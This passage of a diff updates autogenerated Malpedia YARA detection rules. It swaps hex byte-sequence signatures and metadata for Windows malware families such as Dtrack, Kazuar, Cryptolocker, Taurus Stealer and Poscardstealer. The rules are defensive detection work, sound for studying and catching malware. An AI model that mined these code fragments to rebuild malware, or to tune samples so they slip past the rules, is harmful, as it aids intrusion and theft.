-		$sequence_35 = { 6a00 6a27 6a02 6a00 6a01 }
-		$sequence_36 = { 7515 68???????? 6a01 e8???????? }
-		$sequence_37 = { 8d8505feffff 50 e8???????? 83c40c }
-		$sequence_38 = { c645d43a c645d53b c645d63b c645d730 }
-		$sequence_39 = { 488b4338 33d2 488bce 448d4220 }
-		$sequence_40 = { 488b4638 488b0e 4c8d442450 4533c9 }
-		$sequence_41 = { 83c904 c1e803 448bc9 440fafc8 }
-		$sequence_42 = { 488bcf c744242088130000 e8???????? 488b5738 }
-		$sequence_43 = { 488bf0 c70005000000 85db 7415 4c8b4f38 }
-		$sequence_44 = { 488b0f 48894108 488b0f 488b4108 48894128 }
-		$sequence_45 = { 488b4608 488b0e 48894628 488b4638 4c8d4c2450 448bc3 488bd7 }
-		$sequence_46 = { 488b0f 894130 eb06 488b07 }
-		$sequence_47 = { 488b0f 488901 488b07 488338ff }
-		$sequence_48 = { 488b07 896830 33c0 488b5c2458 488b6c2460 488b742468 4883c440 }
-		$sequence_49 = { 4533c9 488bd6 ff90c8010000 8bf8 85c0 }
-		$sequence_50 = { 488bce 8bd8 ff92e8010000 488b6c2458 8bc3 488b5c2450 }
-		$sequence_51 = { 8d8594faffff 50 68???????? ff15???????? }
-		$sequence_52 = { 0304b5100b4200 beffff0000 59 59 }
-		$sequence_53 = { 0304b5100b4200 59 eb02 8bc3 }
-		$sequence_54 = { 030c85100b4200 eb02 8bcb f6412480 }
-		$sequence_55 = { 0304b5100b4200 59 5e eb05 }
-		$sequence_56 = { 0304b5100b4200 59 eb05 b8???????? }
-		$sequence_57 = { 001cbe 40 0023 d18a0688078a 46 }
-		$sequence_58 = { 013d???????? 8b04b5100b4200 0500080000 3bc8 }
+		$sequence_0 = { 50 e8???????? 83c404 68???????? 6804010000 ff15???????? }
+		$sequence_1 = { 83e957 eb02 33c9 c0e004 02c1 3423 c0c003 }
+		$sequence_2 = { c78534ffffff47657457 c78538ffffff696e646f c7853cffffff77546578 66c78540ffffff7457 }
+		$sequence_3 = { c705????????55736572 c705????????33322e64 66c705????????6c6c c605????????00 }
+		$sequence_4 = { 55 8bec 8b450c 3d01020000 }
+		$sequence_5 = { 33c5 8945fc 53 56 57 8d8534ffffff }
+		$sequence_6 = { 68???????? 6a1a 68???????? 57 }
+		$sequence_7 = { 6a00 d1f9 68???????? 03c9 }
+		$sequence_8 = { 56 ffd3 85c0 7403 83c608 }
+		$sequence_9 = { 57 6a00 6880000000 6a04 6a00 6a01 6a04 }
+		$sequence_10 = { 8bf0 56 ff15???????? 50 6a40 }
+		$sequence_11 = { ff15???????? 85c0 7405 83c004 eb02 }
+		$sequence_12 = { ff15???????? b8???????? 83c424 8d5002 668b08 83c002 }
+		$sequence_13 = { c745e4f0b10110 a1???????? eb1a c745e4ecb10110 a1???????? }
+		$sequence_14 = { 8b0485d0a70110 f644010480 0f8432030000 e8???????? 33c9 8b406c 3988a8000000 }
+		$sequence_15 = { c1e306 894df4 895ddc 8b148dd0a70110 8a441a04 a801 0f84fe060000 }
+		$sequence_16 = { 6a53 8885d4fdffff 8d85d5fdffff 6a00 }
+		$sequence_17 = { 898518e5ffff 8b8528e5ffff 8b0485d0a70110 89853ce5ffff 397c0138 }
+		$sequence_18 = { 3bd1 72e4 660f6f05???????? 68???????? f30f7f8558fbffff e8???????? }
+		$sequence_19 = { f3a4 8d8d2cfdffff 49 8d4900 }
+		$sequence_20 = { 84c0 75f7 8da42400000000 ffb554fbffff }
 
 	condition:
-		7 of them and filesize < 5577728
+		7 of them and filesize < 612352
 }
-rule MALPEDIA_Win_Makadocs_Auto : FILE
+rule MALPEDIA_Win_Tflower_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7e05dca-32b3-50ff-8846-a9085f7d1f77"
+		id = "656aa3e8-bdba-5aaa-91e7-d2cae80667fc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.makadocs_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tflower_auto.yar#L1-L155"
 		license_url = "N/A"
-		logic_hash = "d5f25f8d17e486ca7957ad641a672887ad1c923171b871947c68e6256fe8b85d"
+		logic_hash = "5567cb36102c74631716b6bc2ab76355b3e5f81ea5dbfa12803ccef6f940b1df"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95372,32 +95553,38 @@ rule MALPEDIA_Win_Makadocs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7468 8b33 8b4ef0 8b01 8b5010 83ee10 ffd2 }
-		$sequence_1 = { 750a 6805400080 e8???????? 8b1b 56 53 e8???????? }
-		$sequence_2 = { ffd7 8be8 55 6a00 ff15???????? 8bf0 85f6 }
-		$sequence_3 = { 8b1b 6a0a 8d442434 50 53 e8???????? 83c410 }
-		$sequence_4 = { 8d410c 55 e8???????? 84c0 }
-		$sequence_5 = { c68424b400000016 e8???????? 83c410 c68424a400000017 8b08 8b41f4 51 }
-		$sequence_6 = { 59 8b7508 8d34f5c8514200 391e 7404 8bc7 }
-		$sequence_7 = { ffd0 8b442438 53 8d4c2434 51 8d542448 52 }
-		$sequence_8 = { b9???????? ffd0 83c010 894678 c644241c04 8b15???????? 8b420c }
-		$sequence_9 = { e8???????? 83c40c 8d757c 85c0 7504 }
+		$sequence_0 = { 0001 0200 0103 0303 }
+		$sequence_1 = { 0001 7708 00f3 7608 }
+		$sequence_2 = { 0002 7408 00f7 7308 }
+		$sequence_3 = { c1e810 8bcb c1e918 0fb6c0 8b0c8dc0064f00 330c85c0024f00 }
+		$sequence_4 = { 0008 7408 0002 7408 }
+		$sequence_5 = { 0beb 33ff 8b1c8d48fa4e00 8b4c2418 }
+		$sequence_6 = { 000f 7708 0001 7708 }
+		$sequence_7 = { 0bc8 51 e8???????? 83c404 8906 8d4df4 }
+		$sequence_8 = { 0010 740b 0021 740b }
+		$sequence_9 = { 8bcb c1e910 0fb6d1 8b349510674f00 }
+		$sequence_10 = { 001a 0c05 003c0c 05004e0c05 }
+		$sequence_11 = { 0fb64802 8d41ff 83f87f 0f8791000000 0fb680180e4900 ff2485f40d4900 68???????? }
+		$sequence_12 = { 50 6a00 6a00 8d85f0fcffff }
+		$sequence_13 = { 3304bd20d14e00 8b7c243c 8b542420 c1ea18 3304bd20c94e00 8b7c2448 }
+		$sequence_14 = { c1e810 0fb6c0 8b0c8520e54e00 8b44242c }
+		$sequence_15 = { 000b 8605???????? 007885 0500788605 }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 6578176
 }
-rule MALPEDIA_Win_Dtrack_Auto : FILE
+rule MALPEDIA_Win_Former_First_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d8f3c989-b720-5ce0-af93-3bde59a2fdab"
+		id = "a1272d8c-4064-59bd-8cdc-a01b1d547c30"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dtrack_auto.yar#L1-L158"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.former_first_rat_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "245b50e28635461a6214109a0274cb2a754a0f5b0ed2d19ab52e688b26ae3fdb"
+		logic_hash = "ce211a46152dbbb02c8c895324876bff740383a9e542511dce112b8640015613"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95411,37 +95598,38 @@ rule MALPEDIA_Win_Dtrack_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 }
-		$sequence_1 = { 8d85e8fbffff 50 e8???????? 83c40c 8d8da8faffff 51 }
-		$sequence_2 = { 8945fc 68???????? e8???????? 83c404 50 8b55fc }
-		$sequence_3 = { 51 e8???????? 83c410 8b558c }
-		$sequence_4 = { 8d95b1faffff 52 e8???????? 83c40c }
-		$sequence_5 = { 8995e8f5ffff 8a85e8f5ffff 888587f6ffff 8b0d???????? 51 }
-		$sequence_6 = { 80bd4af6ffff00 75ae c78544f6ffff00000000 eb0b }
-		$sequence_7 = { 8b954cf6ffff 8a4201 88854af6ffff 8b8d50f6ffff 3a4101 7523 }
-		$sequence_8 = { 898dd0feffff 8b5508 0395d0feffff 0fbe42ff }
-		$sequence_9 = { 3355fc 81e2ff000000 c1e217 0bca 894d14 }
-		$sequence_10 = { 894518 8b5514 8955f8 8b4518 }
-		$sequence_11 = { 33d0 8b4df8 c1e908 234df8 8b45f8 c1e810 23c8 }
-		$sequence_12 = { 7412 837d0800 740c 837d0c00 7406 837d1408 }
-		$sequence_13 = { 0fb602 0fb64df7 33c1 0fb655fc 33c2 8b4d0c }
-		$sequence_14 = { 8b4d0c 034df0 8801 0fb655f7 2355fc }
+		$sequence_0 = { 3c31 7529 8d74246c e8???????? b904000000 b8???????? 8db424f4000000 }
+		$sequence_1 = { 50 68???????? e8???????? 83c408 eb03 894608 }
+		$sequence_2 = { e8???????? 8d95f4feffff 52 8bd6 }
+		$sequence_3 = { 0f851d010000 8d8424dc010000 e8???????? 8b15???????? }
+		$sequence_4 = { 894c240c 8bd3 3bc1 7420 8d642400 8bf0 8bfa }
+		$sequence_5 = { 740c 68???????? bb06000000 eb0a 68???????? }
+		$sequence_6 = { 8944243c b8???????? 8d5001 8da42400000000 8a08 40 84c9 }
+		$sequence_7 = { be05000000 6a1c 8d4c2448 33c0 51 }
+		$sequence_8 = { 48894758 488d4754 48894760 48832100 }
+		$sequence_9 = { 498d144a 4c3bd2 7306 66418b02 eb45 }
+		$sequence_10 = { 41baffff0000 4c8b08 4d3bc8 7443 }
+		$sequence_11 = { 83e95a 0f8487000000 83e901 7425 }
+		$sequence_12 = { e8???????? 488bc3 e9???????? f6417804 }
+		$sequence_13 = { 48898424c0040000 4533f6 488bda 488bf9 493bce }
+		$sequence_14 = { 488b442440 4c8d44c009 49c1e004 4d03c5 33c0 }
+		$sequence_15 = { 4c89b424c0000000 4c89b424c8000000 488b8c24a0000000 e8???????? 90 }
 
 	condition:
-		7 of them and filesize < 1736704
+		7 of them and filesize < 626688
 }
-rule MALPEDIA_Win_Dented_Auto : FILE
+rule MALPEDIA_Win_Milkmaid_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3499a500-5e01-578b-aa3c-ab625e855061"
+		id = "5948a1f6-8eaf-5535-ac9f-e8e1c89ea107"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dented_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.milkmaid_auto.yar#L1-L98"
 		license_url = "N/A"
-		logic_hash = "2522b2401dbe103d35106dff38664664351f596847e13ae16367587c7b9e72e4"
+		logic_hash = "b839dfa6db2fa7bf81ab8ee61b0a1d4a011d7a0ef5b792c9852059c0fc803283"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95455,32 +95643,30 @@ rule MALPEDIA_Win_Dented_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? bf08020000 8d85ecfbffff 57 }
-		$sequence_1 = { 8b16 50 8b442410 03c1 50 51 8bce }
-		$sequence_2 = { 8b08 8b422c 8b00 2bc1 03c7 33db }
-		$sequence_3 = { ffd6 ff75fc ffd6 6a00 6a01 8d4d08 e8???????? }
-		$sequence_4 = { 8b45e0 c1e814 8b4dfc 5f 33cd 5e e8???????? }
-		$sequence_5 = { e8???????? 68???????? 8d85ecfbffff 57 50 e8???????? }
-		$sequence_6 = { 51 ffb564ffffff 8d8dc0feffff e8???????? ba???????? }
-		$sequence_7 = { 48 0d00ffffff 40 8a0a 8985f8f7ffff 8bbdf8f7ffff 0fb6c1 }
-		$sequence_8 = { 895df8 3b5df4 0f8270ffffff 5f }
-		$sequence_9 = { 59 8bf0 8bcf 33c0 89b5e8f7ffff 2185f0f7ffff }
+		$sequence_0 = { 64892500000000 83ec08 56 68???????? 8d4c2408 c744240c00000000 }
+		$sequence_1 = { c68424dc28010002 e8???????? 8d4c2410 c68424dc28010001 }
+		$sequence_2 = { 68???????? 50 b8c8280100 64892500000000 e8???????? }
+		$sequence_3 = { 8b4c240c 50 51 8d8c2480000000 }
+		$sequence_4 = { 6a1a 6a00 ff15???????? 6aff 8d4c2408 }
+		$sequence_5 = { e8???????? 8d4c240c c78424dc280100ffffffff e8???????? 33c0 8b8c24d4280100 }
+		$sequence_6 = { 33d2 eb05 8b5708 2bd1 8b5c2428 }
+		$sequence_7 = { c744240c00000000 e8???????? 6800010000 8d4c2408 c744241801000000 }
 
 	condition:
-		7 of them and filesize < 450560
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Minibike_Auto : FILE
+rule MALPEDIA_Win_Taurus_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "64fb33a7-6775-549a-bd66-e303dd414aa4"
+		id = "5276d323-6b6a-5024-a34e-199bec8325fa"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minibike"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.minibike_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.taurus_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "bd38364b90ab98904e008cf661267157cc33bb2a7b72870b77767ef9d697acf9"
+		logic_hash = "97e3f8c58ab1394f8abf2308bd9b8032a5e1fd7c003ba327319dfca1b156cb9c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95494,32 +95680,32 @@ rule MALPEDIA_Win_Minibike_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7ffc 83c123 2bc7 83c0fc 83f81f 0f8741040000 }
-		$sequence_1 = { e8???????? 83c408 0f2805???????? 33c9 0f1145b8 c745c8201b233e 66c745cc2700 }
-		$sequence_2 = { 0f57c0 50 660fd685b0feffff 0f2805???????? 51 8d8db0feffff 0f1185d0fcffff }
-		$sequence_3 = { 8b4df4 b867666666 8b1b 83c404 8b4908 2bcb }
-		$sequence_4 = { 898df4fcffff 89b5f0fcffff 8985f8fcffff 85c0 7445 8bb5a4fdffff 8b95f0fcffff }
-		$sequence_5 = { c745d400000000 8d45c0 660fd645cc 0f2805???????? 50 51 8d4dcc }
-		$sequence_6 = { 8d8588fdffff 660fd685e4fdffff 0f2805???????? 50 51 8d8de4fdffff c78584fdffff05000000 }
-		$sequence_7 = { 743a 8b85d8fdffff 2bc7 c1f802 8d0c8500000000 8bc7 81f900100000 }
-		$sequence_8 = { 33c9 c745b00b0c0716 c745b44c060e0e c645b800 90 8d45ad 301408 }
-		$sequence_9 = { e8???????? 8bce e8???????? 8bf0 e9???????? 6a02 33c0 }
+		$sequence_0 = { 8a45e9 30440dea 41 83f915 72f3 8d45ea 885dff }
+		$sequence_1 = { e8???????? 8d4de1 c60000 e8???????? 50 8d8d38ffffff e8???????? }
+		$sequence_2 = { 8bce e8???????? 83c61c 3b750c 75f1 5e 5d }
+		$sequence_3 = { 0f2805???????? 0f1145e8 c6400201 8bb760020000 8a45e8 30440de9 41 }
+		$sequence_4 = { 51 50 6a00 8bcf e8???????? 50 8d8d44feffff }
+		$sequence_5 = { e8???????? 8b75d0 8d8554ffffff 50 8d459c 50 8d8e3c080000 }
+		$sequence_6 = { d2ea 8b4dfc d3f8 22d0 8b45f8 8810 8a450f }
+		$sequence_7 = { 03c7 8945f0 8bf0 33c0 8816 8b0c9520874300 47 }
+		$sequence_8 = { c745f42d627f79 8bca 66c745f8472d 8855fa 0fbec0 250f000080 7905 }
+		$sequence_9 = { 8986c8020000 e8???????? ff7510 8bcb e8???????? 5f 8bc6 }
 
 	condition:
-		7 of them and filesize < 574464
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Stegoloader_Auto : FILE
+rule MALPEDIA_Win_Freenki_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9b5ddd81-f495-5df3-b903-3b034270cab3"
+		id = "90a961ff-4b9f-5590-858d-04fe0571f818"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stegoloader_auto.yar#L1-L175"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.freenki_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "94caf24cac0989b6c0d5f1d1f91d703a3bc60fcd01d5e92e33c9c96d7f83e047"
+		logic_hash = "2dca0dd103141182e01ae8912e5d010c4bde1802bf1b8f905ac7a8ec2594845a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95533,38 +95719,32 @@ rule MALPEDIA_Win_Stegoloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7c2e 6a10 e8???????? 3bc3 }
-		$sequence_1 = { 56 33db 53 ff742414 8bf1 8b06 ff5004 }
-		$sequence_2 = { 59 7430 83c604 85c0 7633 8bd8 }
-		$sequence_3 = { 8945f4 8945f8 8945fc 8d45f0 8bf1 50 }
-		$sequence_4 = { 83ec10 53 33c0 56 50 8945f4 }
-		$sequence_5 = { 5e 5b c9 c3 56 33c9 }
-		$sequence_6 = { c645b44f c645b520 c645b626 c645b726 c645b820 c645b953 c645ba59 }
-		$sequence_7 = { c645d845 c645d920 c645da38 c645db2e c645dc30 c645dd3b c645de20 }
-		$sequence_8 = { 33c9 83ceff 394c240c 7629 57 8b44240c 0fb61401 }
-		$sequence_9 = { 8a07 83c40c 46 3c43 }
-		$sequence_10 = { 50 6aff 83c604 895dfc ff55e8 85c0 0f85b5000000 }
-		$sequence_11 = { bf00200000 397df8 c645ff00 7303 8b7df8 6a14 }
-		$sequence_12 = { 8bec 83ec14 64a130000000 8945fc 8b45fc }
-		$sequence_13 = { 889c05f1feffff 8d85f0feffff 8945f8 8d4508 }
-		$sequence_14 = { 880a 75e9 eb5b 83e803 eb02 }
-		$sequence_15 = { 72ef 8b06 8d4df8 51 8bce }
+		$sequence_0 = { 83e03f 6bc830 8b049578394200 c644082801 897de4 c745fcfeffffff }
+		$sequence_1 = { 83c404 8d8570feffff 50 8d8570fdffff }
+		$sequence_2 = { 56 e8???????? 8bf8 83c408 85ff 7598 8b4dfc }
+		$sequence_3 = { 68???????? 50 ff5110 8b55b8 8b4dcc 2bd1 0f1f440000 }
+		$sequence_4 = { 6a00 6a03 6a00 6a00 57 8d85f8ceffff 50 }
+		$sequence_5 = { 0f1005???????? 6a00 57 0f11044f f30f7e05???????? 660fd6444f10 a1???????? }
+		$sequence_6 = { 83c404 85db 747c 53 56 6a00 }
+		$sequence_7 = { 8b8560ffffff 83c404 8b08 50 }
+		$sequence_8 = { 85db 747c 53 56 }
+		$sequence_9 = { 8bd7 c1fa06 8bc7 83e03f 6bc830 8b049578394200 f644082801 }
 
 	condition:
-		7 of them and filesize < 802816
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Kazuar_Auto : FILE
+rule MALPEDIA_Win_Poscardstealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e7b5f37c-6bd5-5a21-b802-031d3d305256"
+		id = "5940fce6-5171-52a7-adbd-1bfc9feaf26a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kazuar_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poscardstealer_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "02ddda00d237d685622ba3fe593a517532f67079f8df3124667eb63da629b240"
+		logic_hash = "45ecc712be3203f41628cc2ab4db40cb265e98700000888fd4a766a5ab62d728"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95578,32 +95758,32 @@ rule MALPEDIA_Win_Kazuar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4624 4801db 4c01db 0fb71403 8b461c 498d1493 }
-		$sequence_1 = { 751c 8b4624 4801db 4c01db 0fb71403 8b461c }
-		$sequence_2 = { 4489c8 410fbe0c02 84c9 7417 e8???????? }
-		$sequence_3 = { 53 4881ec30010000 31c9 41b804010000 }
-		$sequence_4 = { eb07 48ffc3 ebc8 31c0 4883c420 5b 5e }
-		$sequence_5 = { 4883ec28 e8???????? ba44a73378 4889c1 }
-		$sequence_6 = { 31c9 41b804010000 488d5c242c 4889da ff15???????? }
-		$sequence_7 = { 7428 4989db 498b4b40 e8???????? }
-		$sequence_8 = { 31c9 41b804010000 488d5c242c 4889da }
-		$sequence_9 = { 4889c1 4989c0 e8???????? 4c8d4c2428 31d2 31c9 01c0 }
+		$sequence_0 = { 8d85f4fdffff 50 57 e8???????? 33c9 8d85f4fdffff c785ecedffff07000000 }
+		$sequence_1 = { 56 8d45d4 50 8d4db8 e8???????? 6a01 }
+		$sequence_2 = { c645fc00 3bf7 7409 56 e8???????? }
+		$sequence_3 = { e8???????? 83c404 8b45d4 397de8 7303 8d45d4 8b4de4 }
+		$sequence_4 = { 8bb580edffff 2bb57cedffff c1fe02 3bfe 7426 8b857cedffff 8d14b500000000 }
+		$sequence_5 = { 837d1c10 c745e80f000000 c745e400000000 c645d400 720c 8b4d08 51 }
+		$sequence_6 = { 89430c 8d4310 8d896c614200 5a 668b31 668930 }
+		$sequence_7 = { 8d8d48ffffff e8???????? 898544ffffff 83f8ff 746f 6aff 50 }
+		$sequence_8 = { 66898dd8edffff 837e1408 731c 8b5610 }
+		$sequence_9 = { e8???????? 6a01 53 68???????? 8d4d9c c645fc03 e8???????? }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 362496
 }
-rule MALPEDIA_Win_Cryptolocker_Auto : FILE
+rule MALPEDIA_Win_Darkshell_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ad9b18af-235b-525a-af62-054a0222583c"
+		id = "d4fc21ee-58fa-538c-be7f-a8cab0c5cdbd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptolocker_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkshell_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "75564b552b8c35eb8b1fab229d91abfa4288be2b05e1664b616963e88f02714a"
+		logic_hash = "3ad6f3f944b2f63e5ca49ebc403baac1fe005ab1933d4836c8ac4d2304e8086f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95617,32 +95797,32 @@ rule MALPEDIA_Win_Cryptolocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f605????????01 753b 68???????? ff15???????? }
-		$sequence_1 = { 8b45e8 8901 8b45ec 894104 8b45f0 8906 8b45f4 }
-		$sequence_2 = { 5b 8be5 5d c3 c745fc00000000 8bc6 8945e4 }
-		$sequence_3 = { e8???????? 85c0 0f85e0000000 8b4514 c70000000000 81ff11010000 }
-		$sequence_4 = { 33c0 5b 8be5 5d c21800 ff7514 56 }
-		$sequence_5 = { 2bc7 99 2bc2 8bd8 8b4508 d1fb 8b5004 }
-		$sequence_6 = { c20400 8d85acfdffff 50 8d85a4fbffff 50 ff15???????? 894508 }
-		$sequence_7 = { 6a02 ff15???????? 83f801 770c }
-		$sequence_8 = { ff15???????? 85c0 7480 8b75ec }
-		$sequence_9 = { 85c0 7509 83c640 3b37 72d5 }
+		$sequence_0 = { 6a00 c744246044000000 ff15???????? 8be8 85ed 0f8494000000 }
+		$sequence_1 = { 8b542424 41 25ff0f0000 894c2410 8b0e 03c1 }
+		$sequence_2 = { 8944240c 8d4c240c 89442410 51 89442418 52 50 }
+		$sequence_3 = { 6681384d5a 7543 8b483c 03c1 813850450000 7536 8b4c2408 }
+		$sequence_4 = { 5e 5b 8bc5 5f 5d 83c474 }
+		$sequence_5 = { c20400 8b15???????? 68???????? 52 c705????????01000000 ffd6 }
+		$sequence_6 = { d1ea 3bda 7286 8b4604 }
+		$sequence_7 = { 25ff000000 56 99 f7f9 8b74240c }
+		$sequence_8 = { 8b4c2414 52 8b542428 50 51 52 }
+		$sequence_9 = { 8b5008 33c0 8bfa f2ae }
 
 	condition:
-		7 of them and filesize < 778240
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Komprogo_Auto : FILE
+rule MALPEDIA_Win_Sienna_Purple_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c9a48c86-1d10-5914-97e5-45787475f04f"
+		id = "bf81e591-f4a8-52d6-a4ec-5bf5ebf65e21"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.komprogo_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_purple"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sienna_purple_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a0932a9f38d23a8c7cc40d2bb7fb17066e556ed1703c6642f0b68427cdf44c0d"
+		logic_hash = "7480d66d62837df5528ba634142a2c05768c45916ca5058033314d20ebc94573"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95656,32 +95836,32 @@ rule MALPEDIA_Win_Komprogo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 899638930300 8d96488e0300 899680940300 8986a1910200 8986aa910200 8d86ac700300 }
-		$sequence_1 = { 899674be0300 899ed7720000 8d86052a0000 89869cbe0300 8d9690be0300 8996b0be0300 8d863b6e0300 }
-		$sequence_2 = { 8d8618720300 898613b40000 8d8676490000 8986bcb90300 8d8e80920200 898e4c920200 89bed5b40000 }
-		$sequence_3 = { 8986cd530200 8d8674700300 8986e1530200 8d8614930200 8986c8920200 8d86f0380400 }
-		$sequence_4 = { 8d96f8380400 899699d00000 8d9688bf0300 8996acbf0300 898ecdca0000 }
-		$sequence_5 = { 898ea20d0100 8d8ec8780300 898ecce70300 8d9638a10300 8996d70d0100 8d8e44700300 898ebf3f0000 }
-		$sequence_6 = { 8d9698680300 89969cbc0300 8d8624e20300 8986f8b00200 8d8ee5310000 898ee0310000 8d96b0680300 }
-		$sequence_7 = { 55 8bec 50 51 ff15???????? 85c0 7504 }
-		$sequence_8 = { 32db 56 e8???????? 83c404 5f 5e 8ac3 }
-		$sequence_9 = { 898e9c160100 89bec8c20000 8d8e02960300 898ee2c20000 898659c30000 8d8ee15c0300 898e86c30000 }
+		$sequence_0 = { c7460404000000 8b4604 bb04000000 03c1 c745fc00000000 33c9 f7e3 }
+		$sequence_1 = { 81fe04020000 0f8321010000 888435ecfdffff 8d4601 3d04020000 0f830c010000 c68405ecfdffff00 }
+		$sequence_2 = { e8???????? 84c0 0f8481000000 8d8d1cffffff e8???????? 6a3a 50 }
+		$sequence_3 = { e8???????? 837e0c00 7427 807e1000 7421 6a28 8bcb }
